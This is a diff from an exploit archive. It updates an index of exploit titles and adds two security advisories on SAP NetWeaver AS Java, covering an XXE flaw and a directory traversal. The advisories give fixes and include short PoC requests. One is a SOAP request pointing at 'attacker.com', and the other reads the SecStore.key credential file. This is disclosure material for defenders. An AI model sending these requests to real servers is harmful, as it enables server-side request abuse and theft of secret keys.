26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
|
||||
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
|
||||
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
|
||||
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
|
||||
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
|
||||
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
|
||||
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
|
||||
|
@ -28065,7 +28065,7 @@ id,file,description,date,author,platform,type,port
|
|||
31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service - Directory Traversal",2014-01-24,metasploit,windows,remote,5555
|
||||
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
|
||||
31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
|
||||
31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0
|
||||
31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept (1)",2014-01-31,"Kees Cook",linux,dos,0
|
||||
31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0
|
||||
31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component - 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
|
||||
31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component - 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
|
||||
|
@ -28222,8 +28222,8 @@ id,file,description,date,author,platform,type,port
|
|||
31343,platforms/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow Vulnerability",2008-03-06,"Chris Evans",multiple,dos,0
|
||||
31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
|
||||
31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 - Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
|
||||
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with CONFIG_X86_X32 Exploit",2014-02-02,saelo,linux,local,0
|
||||
31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit",2014-02-02,rebel,linux,local,0
|
||||
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with 'CONFIG_X86_X32' Exploit (2)",2014-02-02,saelo,linux,local,0
|
||||
31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit (3)",2014-02-02,rebel,linux,local,0
|
||||
31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
|
||||
31350,platforms/php/webapps/31350.txt,"CiMe - Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80
|
||||
31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0
|
||||
|
@ -29674,7 +29674,6 @@ id,file,description,date,author,platform,type,port
|
|||
32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
|
||||
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
|
||||
32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 - 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0
|
||||
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
|
||||
32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
|
||||
32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0
|
||||
32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0
|
||||
|
@ -30082,7 +30081,7 @@ id,file,description,date,author,platform,type,port
|
|||
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
|
||||
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
|
||||
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
|
||||
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
|
||||
33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
|
||||
33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
|
||||
33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
|
||||
|
@ -30217,8 +30216,8 @@ id,file,description,date,author,platform,type,port
|
|||
33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting Vulnerability",2010-01-27,s4r4d0,php,webapps,0
|
||||
33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting Vulnerability",2010-01-28,"Richard Brain",cfm,webapps,0
|
||||
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation Vulnerability",2010-01-28,"Matthew Garrett",linux,local,0
|
||||
33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0
|
||||
33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0
|
||||
33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
|
||||
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0
|
||||
33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service Vulnerability",2010-01-14,"Hellcode Research",linux,dos,0
|
||||
33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
|
||||
33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Parameter Cross-Site Scripting Vulnerability",2010-01-14,PaL-D3v1L,php,webapps,0
|
||||
|
@ -31675,7 +31674,7 @@ id,file,description,date,author,platform,type,port
|
|||
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
|
||||
35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0
|
||||
35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0
|
||||
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2)",2012-01-12,zx2c4,linux,local,0
|
||||
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2)",2012-01-12,zx2c4,linux,local,0
|
||||
35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
|
||||
35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
|
||||
35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
|
||||
|
@ -33646,7 +33645,7 @@ id,file,description,date,author,platform,type,port
|
|||
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
||||
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell",2015-06-16,rebel,linux,local,0
|
||||
37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell",2015-06-16,rebel,linux,local,0
|
||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80
|
||||
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080
|
||||
|
@ -35407,7 +35406,7 @@ id,file,description,date,author,platform,type,port
|
|||
39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
|
||||
39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0
|
||||
39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack-Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
|
||||
39166,platforms/linux/local/39166.c,"Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit",2016-01-05,rebel,linux,local,0
|
||||
39166,platforms/linux/local/39166.c,"Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1)",2016-01-05,rebel,linux,local,0
|
||||
39167,platforms/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80
|
||||
39168,platforms/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,php,webapps,80
|
||||
39169,platforms/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",multiple,dos,0
|
||||
|
@ -35467,7 +35466,7 @@ id,file,description,date,author,platform,type,port
|
|||
39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0
|
||||
39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
|
||||
39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
|
||||
39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
|
||||
39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
|
||||
39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
|
||||
39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
|
||||
39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0
|
||||
|
@ -36167,3 +36166,17 @@ id,file,description,date,author,platform,type,port
|
|||
39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80
|
||||
39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80
|
||||
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
|
||||
39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604
|
||||
39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0
|
||||
39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
|
||||
39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80
|
||||
39989,platforms/php/webapps/39989.txt,"Joomla Publisher Pro (com_publisher) Component - SQL Injection",2016-06-21,s0nk3y,php,webapps,80
|
||||
39990,platforms/windows/dos/39990.txt,"Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0
|
||||
39991,platforms/windows/dos/39991.txt,"Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0
|
||||
39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0
|
||||
39993,platforms/win32/dos/39993.txt,"Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win32,dos,0
|
||||
39994,platforms/windows/dos/39994.html,"Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0
|
||||
39995,platforms/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - ctcprotocol Servlet XXE",2016-06-21,ERPScan,java,webapps,0
|
||||
39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
|
||||
39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80
|
||||
39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
211
platforms/java/webapps/39995.txt
Executable file
211
platforms/java/webapps/39995.txt
Executable file
|
@ -0,0 +1,211 @@
|
|||
Application: SAP NetWeaver AS JAVA
|
||||
|
||||
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
|
||||
|
||||
Vendor URL: http://SAP.com
|
||||
|
||||
Bug: XXE
|
||||
|
||||
Sent: 20.10.2015
|
||||
|
||||
Reported: 21.10.2015
|
||||
|
||||
Vendor response: 21.10.2015
|
||||
|
||||
Date of Public Advisory: 08.03.2016
|
||||
|
||||
Reference: SAP Security Note 2235994
|
||||
|
||||
Author: Vahagn Vardanyan (ERPScan)
|
||||
|
||||
|
||||
|
||||
Description
|
||||
|
||||
|
||||
1. ADVISORY INFORMATION
|
||||
|
||||
Title: [ERPSCAN-16-013] SAP NetWeaver AS Java ctcprotocol servlet –
|
||||
XXE vulnerability
|
||||
|
||||
Advisory ID: [ERPSCAN-16-013]
|
||||
|
||||
Risk: Medium
|
||||
|
||||
Advisory URL: https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/
|
||||
|
||||
Date published: 08.03.2016
|
||||
|
||||
Vendors contacted: SAP
|
||||
|
||||
|
||||
2. VULNERABILITY INFORMATION
|
||||
|
||||
Class: XXE
|
||||
|
||||
Impact: denial of service
|
||||
|
||||
Remotely Exploitable: Yes
|
||||
|
||||
Locally Exploitable: No
|
||||
|
||||
CVE-2016-3974
|
||||
|
||||
|
||||
CVSS Information
|
||||
|
||||
CVSS Base Score v3: 6.4 / 10
|
||||
|
||||
CVSS Base Vector:
|
||||
|
||||
AV : Attack Vector (Related exploit range) Network (N)
|
||||
|
||||
AC : Attack Complexity (Required attack complexity) High (H)
|
||||
|
||||
PR : Privileges Required (Level of privileges needed to exploit) High (H)
|
||||
|
||||
UI : User Interaction (Required user participation) None (N)
|
||||
|
||||
S : Scope (Change in scope due to impact caused to components beyond
|
||||
the vulnerable component) Unchanged (U)
|
||||
|
||||
C : Impact to Confidentiality High (H)
|
||||
|
||||
I : Impact to Integrity High (H)
|
||||
|
||||
A : Impact to Availability High (H)
|
||||
|
||||
|
||||
|
||||
3. VULNERABILITY DESCRIPTION
|
||||
|
||||
Authorized attacker can use a special request to read files from the
|
||||
server and then escalate his or her privileges.
|
||||
|
||||
|
||||
|
||||
4. VULNERABLE PACKAGES
|
||||
|
||||
SAP NetWeaver AS JAVA 7.1 - 7.5
|
||||
|
||||
Other versions are probably affected too, but they were not checked.
|
||||
|
||||
|
||||
5. SOLUTIONS AND WORKAROUNDS
|
||||
|
||||
To correct this vulnerability, install SAP Security Note 2235994
|
||||
|
||||
|
||||
|
||||
6. AUTHOR
|
||||
|
||||
Vahagn Vardanyan (ERPScan)
|
||||
|
||||
|
||||
7. TECHNICAL DESCRIPTION
|
||||
|
||||
|
||||
An XML external entity (XXE) vulnerability in the Configuration Wizard
|
||||
in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial
|
||||
of service, conduct SMB Relay attacks, or access arbitrary files via a
|
||||
crafted XML request related to the ctcprotocol servlet.
|
||||
|
||||
PoC
|
||||
|
||||
|
||||
POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
|
||||
Content-Type: text/xml
|
||||
|
||||
<SOAP-ENV:Envelope
|
||||
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
|
||||
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<SOAP-ENV:Body>
|
||||
<m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
|
||||
<url>attacker.com</url>
|
||||
</m:XXX>
|
||||
</SOAP-ENV:Body>
|
||||
</SOAP-ENV:Envelope>
|
||||
|
||||
|
||||
|
||||
|
||||
8. REPORT TIMELINE
|
||||
|
||||
Sent: 20.10.2015
|
||||
|
||||
Reported: 21.10.2015
|
||||
|
||||
Vendor response: 21.10.2015
|
||||
|
||||
Date of Public Advisory: 08.03.2016
|
||||
|
||||
|
||||
|
||||
|
||||
9. REFERENCES
|
||||
|
||||
https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/
|
||||
|
||||
|
||||
10. ABOUT ERPScan Research
|
||||
|
||||
The company’s expertise is based on the research subdivision of
|
||||
ERPScan, which is engaged in vulnerability research and analysis of
|
||||
critical enterprise applications. It has achieved multiple
|
||||
acknowledgments from the largest software vendors like SAP, Oracle,
|
||||
Microsoft, IBM, VMware, HP for discovering more than 400
|
||||
vulnerabilities in their solutions (200 of them just in SAP!).
|
||||
|
||||
ERPScan researchers are proud to have exposed new types of
|
||||
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
|
||||
nominated for the best server-side vulnerability at BlackHat 2013.
|
||||
|
||||
ERPScan experts have been invited to speak, present, and train at 60+
|
||||
prime international security conferences in 25+ countries across the
|
||||
continents. These include BlackHat, RSA, HITB, and private SAP
|
||||
trainings in several Fortune 2000 companies.
|
||||
|
||||
ERPScan researchers lead the project EAS-SEC, which is focused on
|
||||
enterprise application security research and awareness. They have
|
||||
published 3 exhaustive annual award-winning surveys about SAP
|
||||
security.
|
||||
|
||||
ERPScan experts have been interviewed by leading media resources and
|
||||
featured in specialized info-sec publications worldwide. These include
|
||||
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
|
||||
Heise, and Chinabyte, to name a few.
|
||||
|
||||
We have highly qualified experts in staff with experience in many
|
||||
different fields of security, from web applications and
|
||||
mobile/embedded to reverse engineering and ICS/SCADA systems,
|
||||
accumulating their experience to conduct the best SAP security
|
||||
research.
|
||||
|
||||
|
||||
|
||||
11. ABOUT ERPScan
|
||||
|
||||
ERPScan is the most respected and credible Business Application
|
||||
Security provider. Founded in 2010, the company operates globally and
|
||||
enables large Oil and Gas, Financial and Retail organizations to
|
||||
secure their mission-critical processes. Named as an ‘Emerging Vendor’
|
||||
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
|
||||
distinguished by 30+ other awards, ERPScan is the leading SAP SE
|
||||
partner in discovering and resolving security vulnerabilities. ERPScan
|
||||
consultants work with SAP SE in Walldorf to assist in improving the
|
||||
security of their latest solutions.
|
||||
|
||||
ERPScan’s primary mission is to close the gap between technical and
|
||||
business security, and provide solutions to evaluate and secure SAP
|
||||
and Oracle ERP systems and business-critical applications from both,
|
||||
cyber-attacks as well as internal fraud. Usually our clients are large
|
||||
enterprises, Fortune 2000 companies and managed service providers
|
||||
whose requirements are to actively monitor and manage security of vast
|
||||
SAP landscapes on a global scale.
|
||||
|
||||
We ‘follow the sun’ and function in two hubs, located in the Palo Alto
|
||||
and Amsterdam to provide threat intelligence services, agile support
|
||||
and operate local offices and partner network spanning 20+ countries
|
||||
around the globe.
|
210
platforms/java/webapps/39996.txt
Executable file
210
platforms/java/webapps/39996.txt
Executable file
|
@ -0,0 +1,210 @@
|
|||
Application: SAP NetWeaver AS JAVA
|
||||
|
||||
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
|
||||
|
||||
Vendor URL: http://SAP.com
|
||||
|
||||
Bug: Directory traversal
|
||||
|
||||
Sent: 29.09.2015
|
||||
|
||||
Reported: 29.09.2015
|
||||
|
||||
Vendor response: 30.09.2015
|
||||
|
||||
Date of Public Advisory: 08.03.2016
|
||||
|
||||
Reference: SAP Security Note 2234971
|
||||
|
||||
Author: Vahagn Vardanyan (ERPScan)
|
||||
|
||||
|
||||
|
||||
|
||||
Description
|
||||
|
||||
|
||||
1. ADVISORY INFORMATION
|
||||
|
||||
Title: [ERPSCAN-16-012] SAP NetWeaver AS Java directory traversal vulnerability
|
||||
|
||||
Advisory ID: [ERPSCAN-16-012]
|
||||
|
||||
Risk: medium
|
||||
|
||||
Advisory URL: https://erpscan.com/advisories/erpscan-16-012/
|
||||
|
||||
Date published: 08.03.2016
|
||||
|
||||
Vendors contacted: SAP
|
||||
|
||||
|
||||
2. VULNERABILITY INFORMATION
|
||||
|
||||
Class: directory traversal
|
||||
|
||||
Impact: remotely read file from server
|
||||
|
||||
Remotely Exploitable: Yes
|
||||
|
||||
Locally Exploitable: No
|
||||
|
||||
CVE-2016-3976
|
||||
|
||||
|
||||
CVSS Information
|
||||
|
||||
CVSS Base Score v3: 7.5 / 10
|
||||
|
||||
CVSS Base Vector:
|
||||
|
||||
AV : Attack Vector (Related exploit range) Network (N)
|
||||
|
||||
AC : Attack Complexity (Required attack complexity) Low (L)
|
||||
|
||||
PR : Privileges Required (Level of privileges needed to exploit) None (N)
|
||||
|
||||
UI : User Interaction (Required user participation) None (N)
|
||||
|
||||
S : Scope (Change in scope due to impact caused to components beyond
|
||||
the vulnerable component) Changed (C)
|
||||
|
||||
C : Impact to Confidentiality Low (L)
|
||||
|
||||
I : Impact to Integrity None (N)
|
||||
|
||||
A : Impact to Availability None (N)
|
||||
|
||||
|
||||
|
||||
3. VULNERABILITY DESCRIPTION
|
||||
|
||||
An authorized attacker can use a special request to read files from
|
||||
the server and then escalate his or her privileges.
|
||||
|
||||
|
||||
|
||||
|
||||
4. VULNERABLE PACKAGES
|
||||
|
||||
SAP NetWeaver AS JAVA 7.1 - 7.5
|
||||
|
||||
Other versions are probably affected too, but they were not checked.
|
||||
|
||||
|
||||
5. SOLUTIONS AND WORKAROUNDS
|
||||
|
||||
To correct this vulnerability, install SAP Security Note 2234971
|
||||
|
||||
|
||||
|
||||
6. AUTHOR
|
||||
|
||||
Vahagn Vardanyan (ERPScan)
|
||||
|
||||
|
||||
|
||||
7. TECHNICAL DESCRIPTION
|
||||
|
||||
An attacker can use an SAP NetWeaver function CrashFileDownloadServlet
|
||||
to read files from the server.
|
||||
|
||||
|
||||
PoC
|
||||
|
||||
|
||||
GET /XXX/CrashFileDownloadServlet?fileName=..\security\data\SecStore.key
|
||||
|
||||
|
||||
Disclaimer: According to the partnership agreement between ERPScan and
|
||||
SAP, our company is not entitled to publish any detailed information
|
||||
about detected vulnerabilities before SAP releases a patch. After the
|
||||
release, SAP suggests respecting an implementation time of three
|
||||
months and asks security researchers to not to reveal any details
|
||||
during this time. However, In this case, the vulnerability allows an
|
||||
attacker to read arbitrary files on a remote server, possibly
|
||||
disclosing confidential information, and many such services are
|
||||
exposed to the Internet. As responsible security researchers, ERPScan
|
||||
team made a decision not to disseminate the full PoC even after the
|
||||
specified time.
|
||||
|
||||
|
||||
|
||||
8. REPORT TIMELINE
|
||||
|
||||
Send: 29.09.2015
|
||||
|
||||
Reported: 29.09.2015
|
||||
|
||||
Vendor response: 30.09.2015
|
||||
|
||||
Date of Public Advisory: 08.03.2016
|
||||
|
||||
|
||||
|
||||
|
||||
9. REFERENCES
|
||||
|
||||
https://erpscan.com/advisories/erpscan-16-012/
|
||||
|
||||
|
||||
10. ABOUT ERPScan Research
|
||||
|
||||
The company’s expertise is based on the research subdivision of
|
||||
ERPScan, which is engaged in vulnerability research and analysis of
|
||||
critical enterprise applications. It has achieved multiple
|
||||
acknowledgments from the largest software vendors like SAP, Oracle,
|
||||
Microsoft, IBM, VMware, HP for discovering more than 400
|
||||
vulnerabilities in their solutions (200 of them just in SAP!).
|
||||
|
||||
ERPScan researchers are proud to have exposed new types of
|
||||
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
|
||||
nominated for the best server-side vulnerability at BlackHat 2013.
|
||||
|
||||
ERPScan experts have been invited to speak, present, and train at 60+
|
||||
prime international security conferences in 25+ countries across the
|
||||
continents. These include BlackHat, RSA, HITB, and private SAP
|
||||
trainings in several Fortune 2000 companies.
|
||||
|
||||
ERPScan researchers lead the project EAS-SEC, which is focused on
|
||||
enterprise application security research and awareness. They have
|
||||
published 3 exhaustive annual award-winning surveys about SAP
|
||||
security.
|
||||
|
||||
ERPScan experts have been interviewed by leading media resources and
|
||||
featured in specialized info-sec publications worldwide. These include
|
||||
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
|
||||
Heise, and Chinabyte, to name a few.
|
||||
|
||||
We have highly qualified experts in staff with experience in many
|
||||
different fields of security, from web applications and
|
||||
mobile/embedded to reverse engineering and ICS/SCADA systems,
|
||||
accumulating their experience to conduct the best SAP security
|
